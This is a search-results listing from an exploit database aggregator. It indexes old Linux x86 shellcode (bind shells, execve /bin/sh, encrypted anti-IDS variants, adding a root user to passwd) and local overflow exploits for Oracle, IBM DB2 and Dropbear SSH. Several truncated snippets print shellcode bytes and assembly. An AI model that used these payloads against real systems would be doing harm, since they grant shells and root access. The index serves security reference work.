Lucene search
+L

581 matches found

Exploit DB
Exploit DB
added 2004/09/12 12:00 a.m.35 views

linux/x86 portbind port 5074 + fork 130 bytes

linux/x86 portbind port 5074 + fork 130 bytes. Shellcode exploit for linx86 platform / [email protected] 0x9abril0x7d2 syssocketcall 102 0x66 %eax, esta es nuestra rutina principal. En todas las subrutinas vamos a necesitar a: %eax = 0x66. Luego del archivo include/linux/net.h obtenemos l...

SaveExploits0
seebug.org
seebug.org
added 2004/09/12 12:00 a.m.14 views

linux/x86 execve /bin/sh encrypted 58 bytes

No description provided by source. / !!!!!! PRIVATE !!!!!!! // ANTI-IDS SHELLCODE // // !!!!!!!!!!!!!!!!!! // [email protected] 0x1d abril 0x7d2 ./test.c !!! Shellcode execve sh Encriptada !!! AHORA EN 58 BYTES !!!!!!!!!!!!!! Notese que la encripcion se ha hecho a toda la shellcode y no...

7.1AI score
SaveExploits0
seebug.org
seebug.org
added 2004/09/12 12:00 a.m.17 views

linux/x86 execve /bin/sh 24 bytes

No description provided by source. / [email protected] execve/bin/sh. 24 bytes. es lo mas chica que se puede hacer. / char shellcode= "\x31\xc0" // xorl %eax,%eax "\x50" // pushl %eax "\x68\x6e\x2f\x73\x68" // pushl $0x68732f6e "\x68\x2f\x2f\x62\x69" // pushl $0x69622f2f "\x89\xe3" // mov...

7.1AI score
SaveExploits0
zdt
zdt
added 2004/09/12 12:00 a.m.31 views

linux/x86 execve /bin/sh 29 bytes

Exploit for linux/x86 platform in category shellcode ================================= linux/x86 execve /bin/sh 29 bytes ================================= / c1999-2003 Shellcode Research http://www.shellcode.com.ar execve/bin/sh for linux x86 29 bytes by Matias Sedalo xorl %ebx, %ebx pushl %ebx...

7AI score
SaveExploits0
Exploit DB
Exploit DB
added 2004/09/12 12:00 a.m.29 views

linux/x86 execve /bin/sh 24 bytes

linux/x86 execve /bin/sh 24 bytes. Shellcode exploit for linx86 platform / [email protected] execve/bin/sh. 24 bytes. es lo mas chica que se puede hacer. / char shellcode= "\x31\xc0" // xorl %eax,%eax "\x50" // pushl %eax "\x68\x6e\x2f\x73\x68" // pushl $0x68732f6e "\x68\x2f\x2f\x62\x69" ...

7.4AI score
SaveExploits0
Exploit DB
Exploit DB
added 2004/09/12 12:00 a.m.26 views

linux/x86 unix/SPARC irix/mips execve /bin/sh irx.mips 141 bytes

linux/x86 unix/SPARC irix/mips execve /bin/sh irx.mips 141 bytes. Shellcode exploits for multiple platform / Shellcode ejecuta execve /bin/sh en Irix/mips, Linux/x86, Unix/sparc by dymitr1 [email protected] / include char code=...

0.1AI score
SaveExploits0
zdt
zdt
added 2004/09/12 12:00 a.m.23 views

linux/x86 execve /bin/sh 30 bytes

Exploit for linux/x86 platform in category shellcode ================================= linux/x86 execve /bin/sh 30 bytes ================================= / email protected 20 de marzo de 2001 "\x31\xdb" // xorl %ebx,%ebx "\x8d\x43\x17" // leal 0x17%ebx,%eax "\xcd\x80" // int $0x80 "\x31\xd2" //...

7AI score
SaveExploits0
seebug.org
seebug.org
added 2004/09/12 12:00 a.m.16 views

linux/x86 execve /bin/sh 30 bytes

No description provided by source. / [email protected] 20 de marzo de 2001 "\x31\xdb" // xorl %ebx,%ebx "\x8d\x43\x17" // leal 0x17%ebx,%eax "\xcd\x80" // int $0x80 "\x31\xd2" // xorl %edx,%edx "\x52" // pushl %edx "\x68\x6e\x2f\x73\x68" // pushl $0x68732f6e "\x68\x2f\x2f\x62\x69" // push...

7.1AI score
SaveExploits0
zdt
zdt
added 2004/09/12 12:00 a.m.28 views

linux/x86 execve /bin/sh tolower() evasion 41 bytes

Exploit for linux/x86 platform in category shellcode =================================================== linux/x86 execve /bin/sh tolower evasion 41 bytes =================================================== / Linux/x86 tolower evasion, execve /bin/sh eg use: various qpop exploits / include char...

7AI score
SaveExploits0
Exploit DB
Exploit DB
added 2004/09/12 12:00 a.m.28 views

linux/x86 execve /bin/sh xor encrypted 55 bytes

linux/x86 execve /bin/sh xor encrypted 55 bytes. Shellcode exploit for linx86 platform / .file "xor-encrypted shellcode" .version "1.0" .text .align 4 .globl main .type main,@function start: xorl %eax,%eax jmp 0x22 popl %ebx movl 8%ebx,%edx xor %edx,%ebx xor %edx,4%ebx xor %edx,%edx movl...

0.1AI score
SaveExploits0
zdt
zdt
added 2004/09/12 12:00 a.m.35 views

linux/x86 portbind port 5074 + fork() 130 bytes

Exploit for linux/x86 platform in category shellcode =============================================== linux/x86 portbind port 5074 + fork 130 bytes =============================================== / email protected 0x9abril0x7d2 syssocketcall 102 0x66 %eax, esta es nuestra rutina principal. En toda...

7AI score
SaveExploits0
seebug.org
seebug.org
added 2004/09/12 12:00 a.m.18 views

linux/x86 execve /bin/sh 38 bytes

No description provided by source. / [email protected] execve /bin/sh main char name2; name0="/bin/sh"; name1=NULL; execvename0,name,NULL; / include stdio.h char shellcode= "\xeb\x18" // jmp 0x18 // 3-4 "\x5e" // popl %esi // 5 "\x89\x76\x08" // movl %esi, 0x8%esi // 6-8 "\x31\xc0" // xor...

7.1AI score
SaveExploits0
Exploit DB
Exploit DB
added 2004/09/12 12:00 a.m.26 views

linux/x86 add user 104 bytes

linux/x86 add user 104 bytes. Shellcode exploit for linx86 platform / Source to this is pass.s This will append a root line to the passwd file see the source. Shok Matt Conover, [email protected] / char shellcode= "\xeb\x03\x5f\xeb\x05\xe8\xf8\xff\xff\xff\x31\xdb\xb3\x35\x01\xfb"...

7.4AI score
SaveExploits0
Exploit DB
Exploit DB
added 2004/09/12 12:00 a.m.33 views

linux/x86 bsd/x86 execve /bin/sh 38 bytes

linux/x86 bsd/x86 execve /bin/sh 38 bytes. Shellcode exploits for multiple platform / Linux/x86 and Bsd/x86 execve of /bin/sh by dymitri!!! / include char code = "\x31\xc0" "\x50" "\x68\x2f\x2f\x73\x68" "\x68\x2f\x62\x69\x6e" "\x89\xe3" "\x50" "\x54" "\x53" "\x50" "\x8c\xe0" "\x21\xc0" "\x74\x04"...

SaveExploits0
seebug.org
seebug.org
added 2004/09/12 12:00 a.m.20 views

linux/x86 execve /bin/sh xor encrypted 55 bytes

No description provided by source. / .file "xor-encrypted shellcode" .version "1.0" .text .align 4 .globl main .type main,@function start: xorl %eax,%eax jmp 0x22 popl %ebx movl 8%ebx,%edx xor %edx,%ebx xor %edx,4%ebx xor %edx,%edx movl %ebx,0x8%esp movl %edx,0xc%esp movb $0xb,%al leal 0x8%esp,%e...

7.1AI score
SaveExploits0
Exploit DB
Exploit DB
added 2004/09/12 12:00 a.m.37 views

linux/x86 execve /bin/sh 30 bytes

linux/x86 execve /bin/sh 30 bytes. Shellcode exploit for linx86 platform / [email protected] 20 de marzo de 2001 "\x31\xdb" // xorl %ebx,%ebx "\x8d\x43\x17" // leal 0x17%ebx,%eax "\xcd\x80" // int $0x80 "\x31\xd2" // xorl %edx,%edx "\x52" // pushl %edx "\x68\x6e\x2f\x73\x68" // pushl...

0.1AI score
SaveExploits0
exploitpack
exploitpack
added 2004/08/09 12:00 a.m.42 views

Dropbear SSH 0.34 - Remote Code Execution

Dropbear SSH 0.34 - Remote Code Execution / Linux x86 Dropbear SSH quit Connection closed. % objdump -R /usr/local/sbin/dropbear| grep malloc 080673bc R386JUMPSLOT malloc % drop-root -v24 localhost ?.2022u%24$hn@localhost's password: Connection closed by 127.0.0.1 % telnet localhost 10275 Trying...

0.4AI score
SaveExploits0
Exploit DB
Exploit DB
added 2003/10/17 12:00 a.m.63 views

Oracle Database Server 9.0.x - Oracle Binary Local Buffer Overflow

// source: https://www.securityfocus.com/bid/8844/info Oracle Database Server 'oracle' binary has been reported prone to a local buffer overflow vulnerability. The issue likely presents itself due to a lack of sufficient boundary checks performed on command line arguments passed to the affected...

5.8AI score
SaveExploits0
zdt
zdt
added 2003/09/27 12:00 a.m.22 views

IBM DB2 Universal Database 7.2 (db2licm) Local Exploit

Exploit for linux platform in category local exploits ====================================================== IBM DB2 Universal Database 7.2 db2licm Local Exploit ====================================================== / Local Exploit for db2licm IBM db2 v 7.1 Linux/x86 vulnerability researched by...

6.8AI score
SaveExploits0
exploitpack
exploitpack
added 2003/09/18 12:00 a.m.17 views

IBM DB2 db2dart - Buffer Overflow

IBM DB2 db2dart - Buffer Overflow source: https://www.securityfocus.com/bid/8552/info It has been reported that the IBM DB2 db2dart utility is prone to locally exploitable buffer overflow vulnerability. A local attacker, who can authenticate or has access as the db2as user, may exploit this issue...

0.7AI score
SaveExploits0
Rows per page
Query Builder